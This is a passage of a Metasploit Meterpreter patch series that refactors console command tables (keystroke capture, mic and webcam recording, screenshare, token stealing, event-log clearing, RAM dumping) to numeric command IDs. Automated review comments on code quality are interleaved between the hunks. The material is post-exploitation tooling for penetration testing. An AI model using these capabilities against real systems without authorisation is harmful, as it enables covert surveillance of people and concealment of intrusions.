+ ::File.open(saved_audio_path, 'rb+') do |outfile| + outfile.seek(0, ::IO::SEEK_SET) + audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: total_data_len).each { + |e| e.write(outfile) + } + end + end + end + + def cmd_listen(*args) + filename = nil + + listen_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help Banner" ], + "-f" => [ true, "audio filename" ] + ) + + listen_opts.parse(args) do |opt, _idx, val| + case opt + when "-h" + print_line("Usage: listen -f \n") + print_line("Plays saved audio from a file.") + print_line(listen_opts.usage) + return + when "-f" + filename = val + end end + + if filename.nil? + print_error("use '-f' option to provide a filename for playback") + return + end + + Rex::Compat.play_sound(::File.expand_path(filename)) + end + + def cmd_mic_stop + client.mic.mic_stop end end +end +end +end +end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb index ea6ef112a3776..dc07701c9cda4 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb 
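Review bot: In `cmd_mic_start` the `-d` value is taken via `val.to_i` with no validation, so `-d 0`, a negative number or a non-numeric string all yield a non-positive `duration`, and `::Timeout.timeout(duration)` then runs the capture loop with no timeout at all, recording until the session drops, which is the opposite of what a short or bogus duration suggests. Reject it right after option parsing, e.g. `unless duration.positive?` / `print_error("Duration must be a positive number of seconds")` / `return`. `cmd_mic_list` also calls `client.mic.mic_list` three times, each presumably a round-trip to the target; capture it once in a local as `cmd_mic_start` already does with `mic_list`. As with the other files in this commit, the hunk is a whole-file re-indent around a four-line `reqs` change, which hides the functional diff.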
@@ -90,22 +90,22 @@ def commands
 }
 reqs = {
- 'ipconfig' => ['stdapi_net_config_get_interfaces'],
- 'ifconfig' => ['stdapi_net_config_get_interfaces'],
+ 'ipconfig' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES],
+ 'ifconfig' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES],
 'route' => [
 # Also uses these, but we don't want to be unable to list them
 # just because we can't alter them.
- #'stdapi_net_config_add_route',
- #'stdapi_net_config_remove_route',
- 'stdapi_net_config_get_routes'
+ #COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE,
+ #COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE,
+ COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES
 ],
 # Only creates tcp channels, which is something whose availability
 # we can't check directly at the moment.
 'portfwd' => [],
- 'arp' => ['stdapi_net_config_get_arp_table'],
- 'netstat' => ['stdapi_net_config_get_netstat'],
- 'getproxy' => ['stdapi_net_config_get_proxy'],
- 'resolve' => ['stdapi_net_resolve_host'],
+ 'arp' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE],
+ 'netstat' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT],
+ 'getproxy' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY],
+ 'resolve' => [COMMAND_ID_STDAPI_NET_RESOLVE_HOST],
 }
 filter_commands(all, reqs)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 00b0b5eb58782..4d609a7b743ea 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -106,64 +106,70 @@ class Console::CommandDispatcher::Stdapi::Sys # def commands all = { - "clearev" => "Clear the event log", - "drop_token" => "Relinquishes any active impersonation token.", - "execute" => "Execute a command", - "getpid" => "Get the current process identifier", - "getprivs" => "Attempt to enable all privileges available to the current process", - "getuid" => "Get the user that the server is running as", - "getsid" => "Get the SID of the user that the server is running as", - "getenv" => "Get one or more environment variable values", - "kill" => "Terminate a process", - "pkill" => "Terminate processes by name", - "pgrep" => "Filter processes by name", - "ps" => "List running processes", - "reboot" => "Reboots the remote computer", - "reg" => "Modify and interact with the remote registry", - "rev2self" => "Calls RevertToSelf() on the remote machine", - "shell" => "Drop into a system command shell", - "shutdown" => "Shuts down the remote computer", - "steal_token" => "Attempts to steal an impersonation token from the target process", - "suspend" => "Suspends or resumes a list of processes", - "sysinfo" => "Gets information about the remote system, such as OS", - "localtime" => "Displays the target system's local date and time", + 'clearev' => 'Clear the event log', + 'drop_token' => 'Relinquishes any active impersonation token.', + 'execute' => 'Execute a command', + 'getpid' => 'Get the current process identifier', + 'getprivs' => 'Attempt to enable all privileges available to the current process', + 'getuid' => 'Get the user that the server is running as', + 'getsid' => 'Get the SID of the user that the server is running as', + 'getenv' => 'Get one or more environment variable values', + 'kill' => 'Terminate a process', + 'pkill' => 'Terminate processes by name', + 'pgrep' => 'Filter processes by name', + 'ps' => 'List running processes', + 'reboot' => 'Reboots the remote computer', + 'reg' => 'Modify and interact with the remote registry', + 
'rev2self' => 'Calls RevertToSelf() on the remote machine', + 'shell' => 'Drop into a system command shell', + 'shutdown' => 'Shuts down the remote computer', + 'steal_token' => 'Attempts to steal an impersonation token from the target process', + 'suspend' => 'Suspends or resumes a list of processes', + 'sysinfo' => 'Gets information about the remote system, such as OS', + 'localtime' => 'Displays the target system local date and time', } reqs = { - "clearev" => [ "stdapi_sys_eventlog_open", "stdapi_sys_eventlog_clear" ], - "drop_token" => [ "stdapi_sys_config_drop_token" ], - "execute" => [ "stdapi_sys_process_execute" ], - "getpid" => [ "stdapi_sys_process_getpid" ], - "getprivs" => [ "stdapi_sys_config_getprivs" ], - "getuid" => [ "stdapi_sys_config_getuid" ], - "getsid" => [ "stdapi_sys_config_getsid" ], - "getenv" => [ "stdapi_sys_config_getenv" ], - "kill" => [ "stdapi_sys_process_kill" ], - "pkill" => [ "stdapi_sys_process_kill", "stdapi_sys_process_get_processes" ], - "pgrep" => [ "stdapi_sys_process_get_processes" ], - "ps" => [ "stdapi_sys_process_get_processes" ], - "reboot" => [ "stdapi_sys_power_exitwindows" ], - "reg" => [ - "stdapi_registry_load_key", - "stdapi_registry_unload_key", - "stdapi_registry_open_key", - "stdapi_registry_open_remote_key", - "stdapi_registry_create_key", - "stdapi_registry_delete_key", - "stdapi_registry_close_key", - "stdapi_registry_enum_key", - "stdapi_registry_set_value", - "stdapi_registry_query_value", - "stdapi_registry_delete_value", - "stdapi_registry_query_class", - "stdapi_registry_enum_value", + 'clearev' => [ + COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN, + COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR ], - "rev2self" => [ "stdapi_sys_config_rev2self" ], - "shell" => [ "stdapi_sys_process_execute" ], - "shutdown" => [ "stdapi_sys_power_exitwindows" ], - "steal_token" => [ "stdapi_sys_config_steal_token" ], - "suspend" => [ "stdapi_sys_process_attach"], - "sysinfo" => [ "stdapi_sys_config_sysinfo" ], - "localtime" => [ 
"stdapi_sys_config_localtime" ], + 'drop_token' => [COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN], + 'execute' => [COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE], + 'getpid' => [COMMAND_ID_STDAPI_SYS_PROCESS_GETPID], + 'getprivs' => [COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS], + 'getuid' => [COMMAND_ID_STDAPI_SYS_CONFIG_GETUID], + 'getsid' => [COMMAND_ID_STDAPI_SYS_CONFIG_GETSID], + 'getenv' => [COMMAND_ID_STDAPI_SYS_CONFIG_GETENV], + 'kill' => [COMMAND_ID_STDAPI_SYS_PROCESS_KILL], + 'pkill' => [ + COMMAND_ID_STDAPI_SYS_PROCESS_KILL, + COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES + ], + 'pgrep' => [COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES], + 'ps' => [COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES], + 'reboot' => [COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS], + 'reg' => [ + COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY, + COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY, + COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY, + COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY, + COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY, + COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY, + COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY, + COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY, + COMMAND_ID_STDAPI_REGISTRY_SET_VALUE, + COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE, + COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE, + COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS, + COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE, + ], + 'rev2self' => [COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF], + 'shell' => [COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE], + 'shutdown' => [COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS], + 'steal_token' => [COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN], + 'suspend' => [COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH], + 'sysinfo' => [COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO], + 'localtime' => [COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME], } filter_commands(all, reqs) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb index 41dfae6f9f059..dfa36bff96a31 100644 
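Review bot: `'localtime' => 'Displays the target system local date and time'` changes user-visible help text ("system's" became "system") purely to avoid an apostrophe inside single quotes; in a quoting-only conversion the string should stay byte-identical, either by leaving it double-quoted or writing `'Displays the target system\'s local date and time'`. The same drop is visible in the `screenshare` description of ui.rb later in this commit ("remote user's desktop" became "remote user desktop"), so it is worth grepping the series for other silently reworded strings. The command ID migration in `reqs` itself maps one-for-one onto the old string names as far as the visible lines show. `commands` is shown in full, but the enclosing class continues outside the hunk.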
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -23,39 +23,39 @@ class Console::CommandDispatcher::Stdapi::Ui # def commands all = { - "enumdesktops" => "List all accessible desktops and window stations", - "getdesktop" => "Get the current meterpreter desktop", - "idletime" => "Returns the number of seconds the remote user has been idle", - "keyscan_dump" => "Dump the keystroke buffer", - "keyscan_start" => "Start capturing keystrokes", - "keyscan_stop" => "Stop capturing keystrokes", - "keyboard_send" => "Send keystrokes", - "keyevent" => "Send key events", - "mouse" => "Send mouse events", - "screenshot" => "Grab a screenshot of the interactive desktop", - "screenshare" => "Watch the remote user's desktop in real time", - "setdesktop" => "Change the meterpreters current desktop", - "uictl" => "Control some of the user interface components" + 'enumdesktops' => 'List all accessible desktops and window stations', + 'getdesktop' => 'Get the current meterpreter desktop', + 'idletime' => 'Returns the number of seconds the remote user has been idle', + 'keyscan_dump' => 'Dump the keystroke buffer', + 'keyscan_start' => 'Start capturing keystrokes', + 'keyscan_stop' => 'Stop capturing keystrokes', + 'keyboard_send' => 'Send keystrokes', + 'keyevent' => 'Send key events', + 'mouse' => 'Send mouse events', + 'screenshot' => 'Grab a screenshot of the interactive desktop', + 'screenshare' => 'Watch the remote user desktop in real time', + 'setdesktop' => 'Change the meterpreters current desktop', + 'uictl' => 'Control some of the user interface components' # not working yet - # "unlockdesktop" => "Unlock or lock the workstation (must be inside winlogon.exe)", + # 'unlockdesktop' => 'Unlock or lock the workstation (must be inside winlogon.exe)', } reqs = { - "enumdesktops" => [ "stdapi_ui_desktop_enum" ], - "getdesktop" => [ "stdapi_ui_desktop_get" ], - "idletime" => [ "stdapi_ui_get_idle_time" ], - "keyscan_dump" => [ "stdapi_ui_get_keys_utf8" ], - "keyscan_start" => [ "stdapi_ui_start_keyscan" ], - "keyscan_stop" => [ 
"stdapi_ui_stop_keyscan" ], - "keyevent" => [ "stdapi_ui_send_keyevent" ], - "keyboard_send" => [ "stdapi_ui_send_keys" ], - "mouse" => [ "stdapi_ui_send_mouse" ], - "screenshot" => [ "stdapi_ui_desktop_screenshot" ], - "screenshare" => [ "stdapi_ui_desktop_screenshot" ], - "setdesktop" => [ "stdapi_ui_desktop_set" ], - "uictl" => [ - "stdapi_ui_enable_mouse", - "stdapi_ui_enable_keyboard" + 'enumdesktops' => [COMMAND_ID_STDAPI_UI_DESKTOP_ENUM], + 'getdesktop' => [COMMAND_ID_STDAPI_UI_DESKTOP_GET], + 'idletime' => [COMMAND_ID_STDAPI_UI_GET_IDLE_TIME], + 'keyscan_dump' => [COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8], + 'keyscan_start' => [COMMAND_ID_STDAPI_UI_START_KEYSCAN], + 'keyscan_stop' => [COMMAND_ID_STDAPI_UI_STOP_KEYSCAN], + 'keyevent' => [COMMAND_ID_STDAPI_UI_SEND_KEYEVENT], + 'keyboard_send' => [COMMAND_ID_STDAPI_UI_SEND_KEYS], + 'mouse' => [COMMAND_ID_STDAPI_UI_SEND_MOUSE], + 'screenshot' => [COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT], + 'screenshare' => [COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT], + 'setdesktop' => [COMMAND_ID_STDAPI_UI_DESKTOP_SET], + 'uictl' => [ + COMMAND_ID_STDAPI_UI_ENABLE_MOUSE, + COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD ] } filter_commands(all, reqs) @@ -65,7 +65,7 @@ def commands # Name for this dispatcher. # def name - "Stdapi: User interface" + 'Stdapi: User interface' end # diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb index 47a760abd16c3..d897ceb75fad5 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb 
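Review bot: The help text for `screenshare` loses its apostrophe in the new `all` hash — `'Watch the remote user desktop in real time'` replaces "the remote user's desktop" — so the quote-style conversion changed a user-visible string rather than just formatting. Keep the original wording with double quotes for that one entry: `'screenshare' => "Watch the remote user's desktop in real time",`. The closing `end` of the `commands` method lies outside this hunk.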
@@ -22,18 +22,26 @@ class Console::CommandDispatcher::Stdapi::Webcam # def commands all = { - "webcam_chat" => "Start a video chat", - "webcam_list" => "List webcams", - "webcam_snap" => "Take a snapshot from the specified webcam", - "webcam_stream" => "Play a video stream from the specified webcam", - "record_mic" => "Record audio from the default microphone for X seconds" + 'webcam_chat' => 'Start a video chat', + 'webcam_list' => 'List webcams', + 'webcam_snap' => 'Take a snapshot from the specified webcam', + 'webcam_stream' => 'Play a video stream from the specified webcam', + 'record_mic' => 'Record audio from the default microphone for X seconds' } reqs = { - "webcam_chat" => [ "webcam_list" ], - "webcam_list" => [ "webcam_list" ], - "webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ], - "webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ], - "record_mic" => [ "webcam_audio_record" ] + 'webcam_chat' => [COMMAND_ID_STDAPI_WEBCAM_LIST], + 'webcam_list' => [COMMAND_ID_STDAPI_WEBCAM_LIST], + 'webcam_snap' => [ + COMMAND_ID_STDAPI_WEBCAM_START, + COMMAND_ID_STDAPI_WEBCAM_GET_FRAME, + COMMAND_ID_STDAPI_WEBCAM_STOP + ], + 'webcam_stream' => [ + COMMAND_ID_STDAPI_WEBCAM_START, + COMMAND_ID_STDAPI_WEBCAM_GET_FRAME, + COMMAND_ID_STDAPI_WEBCAM_STOP + ], + 'record_mic' => [COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD] } filter_commands(all, reqs) end @@ -42,7 +50,7 @@ def commands # Name for this dispatcher # def name - "Stdapi: Webcam" + 'Stdapi: Webcam' end def cmd_webcam_list diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb index d5793f28e5f6e..486f14150db02 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb 
@@ -6,86 +6,87 @@ module Post module Meterpreter module Ui - class Console::CommandDispatcher::Winpmem +class Console::CommandDispatcher::Winpmem - Klass = Console::CommandDispatcher::Winpmem + Klass = Console::CommandDispatcher::Winpmem - include Console::CommandDispatcher + include Console::CommandDispatcher - # - # Name for this dispatcher - # - def name - 'Winpmem' - end + # + # Name for this dispatcher + # + def name + 'Winpmem' + end - # - # List of supported commands. - # - def commands - { - 'dump_ram' => 'Dump victim RAM', - } - end + # + # List of supported commands. + # + def commands + { + 'dump_ram' => 'Dump victim RAM', + } + end - WINPMEM_ERROR_SUCCESS = 0 - WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1 - WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2 - WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3 - WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4 - WINPMEM_ERROR_UNKNOWN = 255 + WINPMEM_ERROR_SUCCESS = 0 + WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1 + WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2 + WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3 + WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4 + WINPMEM_ERROR_UNKNOWN = 255 - def cmd_dump_ram(*args) - unless args[0] - print_error("Usage: dump_ram [output_file]") - return - end - path_raw = args[0] + def cmd_dump_ram(*args) + unless args[0] + print_error("Usage: dump_ram [output_file]") + return + end + path_raw = args[0] - fd = ::File.new(path_raw, 'wb+') - memory_size, response_code, channel = client.winpmem.dump_ram - case response_code - when WINPMEM_ERROR_FAILED_LOAD_DRIVER - print_error("Failed to load the driver") - return true - when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY - print_error("Failed to get the memory geometry") - return true - when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY - print_error("Failed to allocate memory") - return true - when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL - print_error("Failed to open the meterpreter Channel") - return true - end - print_good("Driver PMEM loaded successfully") - #Arbitrary big buffer size, could 
be optimized - buffer_size = 2 ** 17 - bytes_read = 0 - next_message_byte = memory_size / 10 - print_good("Dumping #{memory_size} bytes (press Ctrl-C to abort)") - begin + fd = ::File.new(path_raw, 'wb+') + memory_size, response_code, channel = client.winpmem.dump_ram + case response_code + when WINPMEM_ERROR_FAILED_LOAD_DRIVER + print_error("Failed to load the driver") + return true + when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY + print_error("Failed to get the memory geometry") + return true + when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY + print_error("Failed to allocate memory") + return true + when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL + print_error("Failed to open the meterpreter Channel") + return true + end + print_good("Driver PMEM loaded successfully") + #Arbitrary big buffer size, could be optimized + buffer_size = 2 ** 17 + bytes_read = 0 + next_message_byte = memory_size / 10 + print_good("Dumping #{memory_size} bytes (press Ctrl-C to abort)") + begin + data = channel.read(buffer_size) + until channel.eof || data.nil? + fd.write(data) + bytes_read += data.length data = channel.read(buffer_size) - until channel.eof || data.nil? - fd.write(data) - bytes_read += data.length - data = channel.read(buffer_size) - if bytes_read >= next_message_byte - print_good(((next_message_byte.to_f / memory_size) * 100).round.to_s + "% Downloaded") - next_message_byte += memory_size / 10 - end + if bytes_read >= next_message_byte + print_good(((next_message_byte.to_f / memory_size) * 100).round.to_s + "% Downloaded") + next_message_byte += memory_size / 10 end - print_status("Download completed") - ensure - print_status("Unloading driver") - fd.close - #Unload the driver on channel close - channel.close end - return true + print_status("Download completed") + ensure + print_status("Unloading driver") + fd.close + #Unload the driver on channel close + channel.close end + return true end - end - end - end - end +end + +end +end +end +end 
From 364b7fac494d6f75c85ca63bc7b8278f9cc3f684 Mon Sep 17 00:00:00 2001 
From: OJ Date: Mon, 4 May 2020 15:06:34 +1000 Subject: [PATCH 05/20] Refactor of command ids into separate files --- lib/rex/post/meterpreter/client.rb | 2 +- lib/rex/post/meterpreter/extension.rb | 4 +- lib/rex/post/meterpreter/extension_mapper.rb | 22 ++- .../meterpreter/extensions/android/android.rb | 2 +- .../extensions/android/command_ids.rb | 33 +++++ .../meterpreter/extensions/android/tlv.rb | 21 --- .../meterpreter/extensions/appapi/appapi.rb | 1 + .../extensions/appapi/command_ids.rb | 20 +++ .../post/meterpreter/extensions/appapi/tlv.rb | 9 -- .../extensions/espia/command_ids.rb | 18 +++ .../meterpreter/extensions/espia/espia.rb | 1 + .../post/meterpreter/extensions/espia/tlv.rb | 6 - .../extensions/extapi/command_ids.rb | 33 +++++ .../meterpreter/extensions/extapi/extapi.rb | 1 + .../post/meterpreter/extensions/extapi/tlv.rb | 21 --- .../extensions/incognito/command_ids.rb | 23 +++ .../extensions/incognito/incognito.rb | 1 + .../meterpreter/extensions/incognito/tlv.rb | 11 -- .../extensions/kiwi/command_ids.rb | 18 +++ .../post/meterpreter/extensions/kiwi/kiwi.rb | 1 + .../post/meterpreter/extensions/kiwi/tlv.rb | 6 - .../extensions/lanattacks/command_ids.rb | 26 ++++ .../extensions/lanattacks/lanattacks.rb | 1 + .../meterpreter/extensions/lanattacks/tlv.rb | 14 -- .../extensions/mimikatz/command_ids.rb | 18 +++ .../extensions/mimikatz/mimikatz.rb | 1 + .../meterpreter/extensions/mimikatz/tlv.rb | 6 - .../extensions/networkpug/command_ids.rb | 19 +++ .../extensions/networkpug/networkpug.rb | 1 + .../meterpreter/extensions/networkpug/tlv.rb | 7 - .../extensions/peinjector/command_ids.rb | 18 +++ .../extensions/peinjector/peinjector.rb | 1 + .../meterpreter/extensions/peinjector/tlv.rb | 6 - .../extensions/powershell/command_ids.rb | 21 +++ .../extensions/powershell/powershell.rb | 1 + .../meterpreter/extensions/powershell/tlv.rb | 9 -- .../extensions/priv/command_ids.rb | 24 ++++ .../post/meterpreter/extensions/priv/priv.rb | 1 + 
.../post/meterpreter/extensions/priv/tlv.rb | 12 -- .../extensions/python/command_ids.rb | 19 +++ .../meterpreter/extensions/python/python.rb | 1 + .../post/meterpreter/extensions/python/tlv.rb | 8 -- .../extensions/sniffer/command_ids.rb | 24 ++++ .../meterpreter/extensions/sniffer/sniffer.rb | 1 + .../meterpreter/extensions/sniffer/tlv.rb | 12 -- .../extensions/stdapi/command_ids.rb | 132 ++++++++++++++++++ .../meterpreter/extensions/stdapi/stdapi.rb | 1 + .../post/meterpreter/extensions/stdapi/tlv.rb | 124 ---------------- .../extensions/unhook/command_ids.rb | 18 +++ .../post/meterpreter/extensions/unhook/tlv.rb | 6 - .../meterpreter/extensions/unhook/unhook.rb | 3 +- .../extensions/winpmem/command_ids.rb | 18 +++ .../meterpreter/extensions/winpmem/tlv.rb | 6 - .../meterpreter/extensions/winpmem/winpmem.rb | 1 + .../ui/console/command_dispatcher/android.rb | 3 + .../ui/console/command_dispatcher/appapi.rb | 3 + .../console/command_dispatcher/extapi/adsi.rb | 2 + .../command_dispatcher/extapi/clipboard.rb | 2 + .../command_dispatcher/extapi/service.rb | 2 + .../command_dispatcher/extapi/window.rb | 2 + .../console/command_dispatcher/extapi/wmi.rb | 2 + .../command_dispatcher/lanattacks/dhcp.rb | 2 + .../command_dispatcher/lanattacks/tftp.rb | 2 + .../ui/console/command_dispatcher/sniffer.rb | 36 ++--- .../console/command_dispatcher/stdapi/fs.rb | 4 +- .../console/command_dispatcher/stdapi/mic.rb | 2 + .../console/command_dispatcher/stdapi/net.rb | 8 +- .../console/command_dispatcher/stdapi/sys.rb | 3 +- .../console/command_dispatcher/stdapi/ui.rb | 8 +- .../command_dispatcher/stdapi/webcam.rb | 2 + 70 files changed, 575 insertions(+), 322 deletions(-) create mode 100644 lib/rex/post/meterpreter/extensions/android/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/appapi/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/espia/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/extapi/command_ids.rb create 
mode 100644 lib/rex/post/meterpreter/extensions/incognito/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/powershell/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/priv/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/python/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/unhook/command_ids.rb create mode 100644 lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index 82caf1b4ace9d..8fa7c26a9c6eb 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -318,7 +318,7 @@ def method_missing(symbol, *args) # def add_extension(name, commands=[]) self.commands |= [] - self.commands.concat(commands.map {|v| Rex::Post::Meterpreter.command_id_to_method_string(v)}) + self.commands.concat(commands) # Check to see if this extension has already been loaded. if ((klass = self.class.check_ext_hash(name.downcase)) == nil) diff --git a/lib/rex/post/meterpreter/extension.rb b/lib/rex/post/meterpreter/extension.rb index 4789c1d7684f7..7db256f222bf1 100644 --- a/lib/rex/post/meterpreter/extension.rb +++ b/lib/rex/post/meterpreter/extension.rb 
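Review bot: `self.commands |= []` followed by `self.commands.concat(commands)` no longer de-duplicates: the `|=` only removes duplicates already present, and `concat` then appends every incoming id even when it is already listed, so loading an extension twice grows the list. If set semantics are intended, as the original `|=` suggests, a single `self.commands |= commands` does both steps in one line. The rest of `add_extension` continues beyond the hunk, so whether later callers are sensitive to duplicates is not visible here.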
@@ -24,9 +24,9 @@ def initialize(client, name) # # The name of the extension. # - attr_reader :name + attr_accessor :name protected - attr_reader :client # :nodoc: + attr_accessor :client # :nodoc: end end; end; end diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb index d062c54d40016..320ab7fc2585d 100644 --- a/lib/rex/post/meterpreter/extension_mapper.rb +++ b/lib/rex/post/meterpreter/extension_mapper.rb @@ -10,19 +10,31 @@ class ExtensionMapper def self.get_extension_id(name) k = self.get_extension_klass(name) - k.id + k.extension_id end def self.get_extension_klass(name) - name.capitalize! + name.downcase unless @@klasses[name] - require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}") - s = name.to_sym + require("rex/post/meterpreter/extensions/#{name}/#{name}") + s = Rex::Post::Meterpreter::Extensions.constants.select { |c| + name == c.to_s.downcase + }[0] @@klasses[name] = Rex::Post::Meterpreter::Extensions.const_get(s).const_get(s) end - @@klasses[name.downcase] + @@klasses[name] + end + + def self.dump_extensions + base = ::File.join(File.dirname(__dir__), 'meterpreter/extensions') + names = ::Dir.entries(base).select { |e| + ::File.directory?(::File.join(base, e)) && !['.', '..'].include?(e) + } + names.each { |n| + STDERR.puts("EXTENSION_ID_#{n.upcase} = #{self.get_extension_id(n)}\n") + } end end diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 4a11370d7dc05..fd33be442071c 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb 
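Review bot: Switching `attr_reader :name` to a public `attr_accessor :name` makes every extension's name writable from outside the object, and nothing in this hunk shows a caller that needs that. If the writer is only needed by the extension's own initialisation or by subclasses, `attr_reader :name` plus `attr_writer :name` under the existing `protected` marker keeps the public surface as narrow as before; the `client` accessor is already protected, so this would make the two consistent.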
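Review bot: In `get_extension_klass` the bare `name.downcase` discards its result — `String#downcase` is non-mutating — so `name` keeps the caller's casing and is then used unchanged in the `require` path, in the `name == c.to_s.downcase` comparison and as the `@@klasses` cache key; `name = name.downcase` is what the replaced `capitalize!` line was standing in for. The `select { … }[0]` lookup yields nil when no constant matches, and `const_get(nil)` then fails with a TypeError that does not name the extension; `s = Rex::Post::Meterpreter::Extensions.constants.find { |c| name == c.to_s.downcase }` followed by `raise ArgumentError, "unknown extension #{name}" unless s` gives a clear failure instead. Because `name` is interpolated straight into a `require` path, a guard such as `raise ArgumentError unless name.match?(/\A[a-z0-9_]+\z/)` at the top of the method would keep the lookup bound to the extensions tree should the name ever originate outside the framework; where callers obtain it is not visible in this hunk.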
